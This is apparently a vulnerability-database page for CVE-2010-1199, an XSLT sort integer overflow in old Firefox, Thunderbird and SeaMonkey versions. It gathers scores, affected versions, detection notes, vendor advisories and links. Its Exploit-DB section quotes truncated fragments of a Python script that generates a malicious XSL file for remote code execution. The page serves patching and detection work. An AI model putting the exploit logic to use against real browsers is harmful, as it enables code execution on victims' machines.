CVE-2010-1199
published 2010-06-24CVE-2010-1199: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey…
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
11.42%
95.5th percentile
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
Affected
89 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | seamonkey | <= 2.0.4 | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit triggers integer overflow via an extremely large BlockCount value (2147483647) used to generate XSLT sort nodes with large text values, causing heap buffer overflow during XSLT node sorting. ↗
- →Exploit generates malicious XSL and XML files (abysssec.xsl / abyssssec.xml) delivered to the victim browser; monitor for creation or serving of these filenames. ↗
- →The vulnerability is triggered by a large text value for an XSLT sort node; network/content inspection for XSLT stylesheets containing xsl:sort elements with very large string data may indicate exploitation attempts. ↗
- ·Affected versions: Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, SeaMonkey before 2.0.5. Red Hat Enterprise Linux 6 package 'firefox' is listed as Not Affected. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_ubuntu10.0CRITICAL
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Firefox and Xulrunner vulnerability
vendor_ubuntu·2010-07-26·CVSS 10.0
CVE-2010-2755 [CRITICAL] Firefox and Xulrunner vulnerability
Title: Firefox and Xulrunner vulnerability
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
USN-957-1 fixed vulnerabilities in Firefox and Xulrunner. Daniel Holbert
discovered that the fix for CVE-2010-1214 introduced a regression which did
not properly initialize a plugin pointer. If a user were tricked into
viewing a malicious site, a remote attacker could use this to crash the
browser or run arbitrary code as the user invoking the program.
(CVE-2010-2755)
This update fixes the problem.
Original advisory details:
If was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2010-07-23·CVSS 9.8
CVE-2008-5913 [CRITICAL] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
USN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update
provides the corresponding updates for Ubuntu 9.04 and 9.10, along with
additional updates affecting Firefox 3.6.6.
Several flaws were discovered in the browser engine of Firefox. If a user
were tricked into viewing a malicious site, a remote attacker could use
this to crash the browser or possibly run arbitrary code as the user
invoking the program. (CVE-2010-1208, CVE-2010-1209, CVE-2010-1211,
CVE-2010-1212)
An integer overflow was discovered in how Firefox processed plugin
parameters. An attacker could exploit this to crash the browser or possibly
run arbitrary
Ubuntu
ant, apturl, Epiphany, gluezilla, gnome-python-extras, liferea, mozvoikko, OpenJDK, packagekit, ubufox, webfav, yelp update
vendor_ubuntu·2010-07-23·CVSS 10.0
[CRITICAL] ant, apturl, Epiphany, gluezilla, gnome-python-extras, liferea, mozvoikko, OpenJDK, packagekit, ubufox, webfav, yelp update
Title: ant, apturl, Epiphany, gluezilla, gnome-python-extras, liferea, mozvoikko, OpenJDK, packagekit, ubufox, webfav, yelp update
Summary: This update is for use with the new Xulrunner provided in USN-930-4.
USN-930-4 fixed vulnerabilities in Firefox and Xulrunner on Ubuntu 9.04 and
9.10. This update provides updated packages for use with Firefox 3.6 and
Xulrunner 1.9.2.
Original advisory details:
If was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2010-07-06·CVSS 10.0
CVE-2010-1199 [CRITICAL] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Martin Barbella discovered an integer overflow in an XSLT node sorting
routine. An attacker could exploit this to overflow a buffer and cause a
denial of service or possibly execute arbitrary code with the privileges of
the user invoking the program. (CVE-2010-1199)
An integer overflow was discovered in Thunderbird. If a user were tricked
into viewing malicious content, an attacker could overflow a buffer and
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2010-1196)
Several flaws were discovered in the browser engine of Thunderbird. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
pr
Ubuntu
Firefox regression
vendor_ubuntu·2010-06-30·CVSS 10.0
[CRITICAL] Firefox regression
Title: Firefox regression
Summary: This update fixes a problem with Firefox not installing alongside the old
Firefox 2 package.
USN-930-1 fixed vulnerabilities in Firefox. Due to a software packaging
problem, the Firefox 3.6 update could not be installed when the firefox-2
package was also installed. This update fixes the problem and updates
apturl for the change.
Original advisory details:
If was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tr
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2010-06-29·CVSS 10.0
CVE-2010-1121 [CRITICAL] Firefox and Xulrunner vulnerabilities
Title: Firefox and Xulrunner vulnerabilities
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
If was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2010-1200, CVE-2010-1201,
CVE-2010-1202, CVE-2010-1203)
A
Ubuntu
apturl, Epiphany, gecko-sharp, gnome-python-extras, liferea, rhythmbox, totem, ubufox, yelp update
vendor_ubuntu·2010-06-29·CVSS 10.0
[CRITICAL] apturl, Epiphany, gecko-sharp, gnome-python-extras, liferea, rhythmbox, totem, ubufox, yelp update
Title: apturl, Epiphany, gecko-sharp, gnome-python-extras, liferea, rhythmbox, totem, ubufox, yelp update
Summary: This update is for use with the new Xulrunner provided in USN-930-1.
USN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update
provides updated packages for use with Firefox 3.6 and Xulrunner 1.9.2 on
Ubuntu 8.04 LTS.
Original advisory details:
If was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tricked into viewing a m
Red Hat
Mozilla Integer Overflow in XSLT Node Sorting
vendor_redhat·2010-06-22·CVSS 9.3
CVE-2010-1199 [CRITICAL] CWE-190 Mozilla Integer Overflow in XSLT Node Sorting
Mozilla Integer Overflow in XSLT Node Sorting
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
Package: firefox (Red Hat Enterprise Linux 6) - Not affected
GHSA
GHSA-gf95-pc3w-rmh9: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3
ghsa_unreviewed·2022-05-02
CVE-2010-1199 [HIGH] GHSA-gf95-pc3w-rmh9: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
No detection rules found.
Exploit-DB
Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution
exploitdb·2010-09-09·CVSS 9.3
CVE-2010-1199 [CRITICAL] Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution
Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
Beatles
"""
BlockCount = 43000
count = 1
while(count\n"
count = count + 1
myStyle = myStyle +"""
"""
cssFile = open("abysssec.xsl","w")
cssFile.write(myStyle)
cssFile.close()
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
"""
block = """
"""
BlockCount = 2147483647
rowCount=10
#myStyle = myStyle + "\n"
count = 1
while(count
"""
myStyle = myStyle + " "+"A"*rowCount+"\n"
myStyle = myStyle + """
Lennon
"""
myStyle = myStyle + " "+"B"*rowCount+"\n"
myStyle = myStyle + """ McCartney
"""
myStyle = myStyle + " "+"C"*rowCou
Exploit-DB
Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
exploitdb·2010-06-22
CVE-2010-1199 Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
---
source: https://www.securityfocus.com/bid/41082/info
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will likely result in denial-of-service conditions.
These issues are fixed in:
Firefox 3.6.4
Firefox 3.5.10
Thunderbird 3.0.5
SeaMonkey 2.0.5
NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34192.
http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043369.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-June/043405.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-07/msg00005.htmlhttp://secunia.com/advisories/40323http://secunia.com/advisories/40326http://secunia.com/advisories/40401http://secunia.com/advisories/40481http://support.avaya.com/css/P8/documents/100091069http://ubuntu.com/usn/usn-930-1http://www.exploit-db.com/exploits/14949http://www.mandriva.com/security/advisories?name=MDVSA-2010:125http://www.mozilla.org/security/announce/2010/mfsa2010-30.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0499.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0500.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0501.htmlhttp://www.securityfocus.com/archive/1/511972/100/0/threadedhttp://www.securityfocus.com/bid/41050http://www.securityfocus.com/bid/41082http://www.securitytracker.com/id?1024138http://www.securitytracker.com/id?1024139http://www.ubuntu.com/usn/usn-930-2http://www.vupen.com/english/advisories/2010/1551http://www.vupen.com/english/advisories/2010/1556http://www.vupen.com/english/advisories/2010/1557http://www.vupen.com/english/advisories/2010/1592http://www.vupen.com/english/advisories/2010/1640http://www.vupen.com/english/advisories/2010/1773http://www.zerodayinitiative.com/advisories/ZDI-10-113https://bugzilla.mozilla.org/show_bug.cgi?id=554255https://exchange.xforce.ibmcloud.com/vulnerabilities/59666https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10885https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13287http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043369.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-June/043405.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-07/msg00005.htmlhttp://secunia.com/advisories/40323http://secunia.com/advisories/40326http://secunia.com/advisories/40401http://secunia.com/advisories/40481http://support.avaya.com/css/P8/documents/100091069http://ubuntu.com/usn/usn-930-1http://www.exploit-db.com/exploits/14949http://www.mandriva.com/security/advisories?name=MDVSA-2010:125http://www.mozilla.org/security/announce/2010/mfsa2010-30.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0499.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0500.htmlhttp://www.redhat.com/support/errata/RHSA-2010-0501.htmlhttp://www.securityfocus.com/archive/1/511972/100/0/threadedhttp://www.securityfocus.com/bid/41050http://www.securityfocus.com/bid/41082http://www.securitytracker.com/id?1024138http://www.securitytracker.com/id?1024139http://www.ubuntu.com/usn/usn-930-2http://www.vupen.com/english/advisories/2010/1551http://www.vupen.com/english/advisories/2010/1556http://www.vupen.com/english/advisories/2010/1557http://www.vupen.com/english/advisories/2010/1592http://www.vupen.com/english/advisories/2010/1640http://www.vupen.com/english/advisories/2010/1773http://www.zerodayinitiative.com/advisories/ZDI-10-113https://bugzilla.mozilla.org/show_bug.cgi?id=554255https://exchange.xforce.ibmcloud.com/vulnerabilities/59666https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10885https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13287
2010-06-24
Published